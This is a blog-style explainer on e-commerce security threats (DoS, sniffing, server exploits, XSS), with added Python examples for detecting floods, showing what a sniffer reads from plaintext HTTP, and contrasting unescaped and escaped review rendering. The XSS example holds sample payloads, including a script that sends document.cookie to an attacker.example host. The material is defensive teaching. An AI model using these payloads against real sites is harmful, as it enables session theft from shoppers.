While I was handing over my credit card to the waiter in a restaurant, my mother was staring at me in shock. She asked me “what if they draw out all the money from your account?” Just then a question came to my mind: we rarely even think twice before handing over our credit cards to a waiter or a store clerk, so why do we often feel jittery while purchasing something online, or going for online banking? What do we fear? The obvious answer was: Security.
Security issues with e-commerce websites are the biggest question mark in our minds whenever we make an online transaction. Such issues can arise from an improperly configured site, and criminals don’t stay out of the game either, so the headache of the common man only grows. Apart from the fact that viruses, Trojans and other malware can hit any website, there are innumerable security issues with e-commerce websites that could be discussed, but here’s a list of the most important attacks:
- DoS attacks: No, it is not MS-DOS. DoS stands for Denial of Service. The attacker floods a website with a huge number of automated requests. The server cannot tell them apart from requests made by genuine users, so it tries to process all of them as usual, and the sheer volume exhausts its capacity (CPU, memory, connections or bandwidth). The server slows to a crawl or stops responding altogether, and genuine users are locked out. DDoS, or Distributed Denial of Service, is the same idea carried out from many machines at once: the attacker compromises a large number of computers with malware, turns them into a botnet under his control, and makes all of them send useless requests to the target at the same time, which is far harder to filter than a flood coming from a single source. A DoS attack that runs for even a few minutes can cost a shop dearly in lost sales.
- Sniffing: Sniffing the network between the customer’s computer and the server can put sensitive information straight into the hands of the criminal/cracker. The attacker monitors the data flowing between the two by tapping the network at some point along the path, and the most valuable points are close to the customer’s system or close to the server. Wireless networks are the classic example near the customer: on an open or poorly secured Wi-Fi hotspot anyone in range can record the traffic, and if that traffic is unencrypted there is no need to say what happens when your credit card details are in it. Points near the server can likewise be tapped to monitor the incoming traffic. Encryption is what makes the captured traffic useless to the attacker at either position: with TLS (the successor to the now obsolete SSL) the sniffer sees only ciphertext between the browser and the server. This protection only holds if every page that handles a login or card details is served over HTTPS and the site never lets the browser fall back to plain HTTP.
- Server root exploits: Exploiting the server itself is another very effective way to gain unauthorized access to data. Attacking a customer’s system only gives the attacker information about a single user, but compromising the server can expose both the merchant’s data and every customer’s. Basically, this is done by finding security holes and software bugs in the target server and then exploiting them. Buffer overflows and Cross-Site Scripting (XSS) are two common examples, though they work very differently. A buffer overflow is a bug in native code (the web server, a module or a library it loads) that lets more data be written than a fixed-size buffer can hold; the overflow corrupts adjacent memory such as the execution stack, and a carefully crafted input can redirect the server into executing code supplied by the attacker. XSS, on the other hand, does not run anything on the server: the attacker plants script in content the site displays to others (a product review, a search result, a profile name), the site serves it back unescaped, and the script runs in other customers’ browsers with access to their session cookies and everything they can see on the site. Wherever the server stores user-supplied text and shows it back without escaping it, an XSS hole is waiting.
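To make the DoS item above concrete, here is an added example (not code from the original post) that scans web-server access-log lines and reports the clients whose request rate inside a short sliding window is far beyond what a shopper produces. The log lines are constructed for the example; the IP addresses, paths and the 10-second/30-request threshold are assumptions chosen for illustration, not figures from the post.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Fields of a "combined"-style access log line: client IP, timestamp, request, status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+|-)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def constructed_log():
    """A small constructed access log (not real traffic): one flooding client that
    fires 60 requests in six seconds, and one ordinary shopper with 6 requests in a minute."""
    base = datetime(2023, 10, 10, 13, 55, 36, tzinfo=timezone.utc)
    lines = []
    for i in range(60):
        ts = (base + timedelta(seconds=i // 10)).strftime(TS_FMT)
        lines.append(f'203.0.113.7 - - [{ts}] "GET /checkout HTTP/1.1" 200 2048')
    for i in range(6):
        ts = (base + timedelta(seconds=10 * i)).strftime(TS_FMT)
        lines.append(f'198.51.100.20 - - [{ts}] "GET /product/42 HTTP/1.1" 200 8192')
    return lines


def peak_requests_per_client(lines, window_seconds=10):
    """For every client IP, the largest number of requests seen inside any
    sliding window of `window_seconds`. Lines that do not parse are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append((datetime.strptime(m.group(2), TS_FMT), m.group(1)))
    events.sort()  # logs are normally chronological, but never rely on it

    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peak = defaultdict(int)
    for ts, ip in events:
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # drop requests that have aged out of the window
        peak[ip] = max(peak[ip], len(q))
    return dict(peak)


def flood_sources(lines, window_seconds=10, threshold=30):
    """Client IPs whose peak rate reaches `threshold` requests per window:
    these are the candidates for rate limiting or blocking at the edge."""
    return {ip: n for ip, n in peak_requests_per_client(lines, window_seconds).items()
            if n >= threshold}


if __name__ == "__main__":
    for ip, n in flood_sources(constructed_log()).items():
        print(f"{ip}: {n} requests in a 10s window")
```

This catches the single-source flood the post describes first, because the host can still see and log the requests. The distributed variant is different: thousands of bots may each stay under any per-client threshold, and a volumetric DDoS can saturate the link before a single log line is written, which is why mitigation for DDoS has to sit upstream of the shop’s own server rather than in its logs.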
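For the sniffing item above, here is an added example (not code from the original post) of what an eavesdropper actually pulls out of a checkout submitted over plain HTTP, next to a small check of the response headers that decide whether a browser will keep using TLS. The captured request, the hostname shop.example, the session value and the header sets are all constructed for the example; the card number is the well-known 4111… test number, not a real card.

```python
from urllib.parse import parse_qs

# Constructed example of what a sniffer on the path records when a checkout form is
# submitted over plain HTTP. The card number is a standard test number, not a real card.
PLAINTEXT_CAPTURE = (
    b"POST /checkout HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Cookie: session=5f1c9a2e\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 55\r\n"
    b"\r\n"
    b"card=4111111111111111&exp=12%2F27&cvv=123&name=Jane+Doe"
)


def harvest(capture):
    """What an eavesdropper gets from one captured plaintext HTTP request:
    the path, every cookie (i.e. the session) and every form field."""
    head, _, body = capture.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    form = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
    return {"method": method, "path": path, "cookies": cookies, "form": form}


def transport_findings(response_headers):
    """Response headers that would leave the customer's next request exposed to a sniffer.
    `response_headers` is a list of (name, value) pairs as a server sends them."""
    findings = []
    lowered = [(n.lower(), v) for n, v in response_headers]
    if not any(n == "strict-transport-security" for n, _ in lowered):
        findings.append("no Strict-Transport-Security header: browser may later use plain HTTP")
    for n, v in lowered:
        if n == "set-cookie":
            attrs = [a.strip().lower() for a in v.split(";")[1:]]
            if "secure" not in attrs:
                findings.append(f"cookie without Secure flag: {v.split('=', 1)[0]}")
        if n == "location" and v.lower().startswith("http://"):
            findings.append(f"redirect to plaintext URL: {v}")
    return findings


# Constructed header sets: a weak response and a hardened one (illustration only).
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=5f1c9a2e; Path=/"),
    ("Location", "http://shop.example/account"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session=5f1c9a2e; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Location", "https://shop.example/account"),
]

if __name__ == "__main__":
    print(harvest(PLAINTEXT_CAPTURE))
    print(transport_findings(WEAK_RESPONSE))
```

Run against the plaintext capture, `harvest` hands back the card number, expiry, CVV and the session cookie without any effort; with TLS in place the same bytes on the wire are opaque TLS records, and the sniffer learns little more than which host was contacted and how much was sent. The second function is the check that keeps things that way: a missing HSTS header or a session cookie without the Secure flag means the browser can be steered onto plain HTTP for the next request, and the first capture is enough.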
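For the XSS half of the server-exploit item above, here is an added example (not code from the original post) showing the vulnerable rendering pattern beside its escaped form, with a small parser that lists what a browser would execute in each result. The product-review template, the attacker.example hostname and the two payloads are constructed for the example. The buffer-overflow half gets no example here because it lives in native code rather than in the web application.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs posted through a product-review form (samples, not real traffic).
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_review_unsafe(author, text):
    """The vulnerable pattern: user-supplied text dropped straight into the page template."""
    return f'<div class="review" data-author="{author}"><p>{text}</p></div>'


def render_review_safe(author, text):
    """Same template with every user-supplied value HTML-escaped for the context it lands in.
    quote=True also escapes quotes, which is what keeps the attribute from being broken out of."""
    return (f'<div class="review" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(text, quote=True)}</p></div>')


class _Inventory(HTMLParser):
    """Collect tag names and on* event-handler attributes a browser would act on."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def executable_parts(fragment):
    """Anything in the rendered fragment that would execute in a customer's browser."""
    inv = _Inventory()
    inv.feed(fragment)
    inv.close()
    return {"script_tags": inv.tags.count("script"), "event_handlers": inv.handlers}


if __name__ == "__main__":
    for renderer in (render_review_unsafe, render_review_safe):
        print(renderer.__name__, executable_parts(renderer(ATTR_PAYLOAD, BODY_PAYLOAD)))
```

The unsafe renderer turns the review body into a live `<script>` that ships every reader’s session cookie to the attacker, and the author field into an `onmouseover` handler; the escaped renderer shows the same text as harmless characters. Escaping is specific to where the value lands: this covers element text and quoted attributes, while a value dropped into a URL, a script block or a stylesheet needs the encoding for that context, which is why a template engine with escaping on by default is the practical answer for a whole site.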
These are only a few of the attacks that leave potential e-commerce users paranoid enough to fall back on offline options. If e-commerce players solve this problem of establishing trust by making their portals rock-solid, a huge section of potential customers can be unlocked.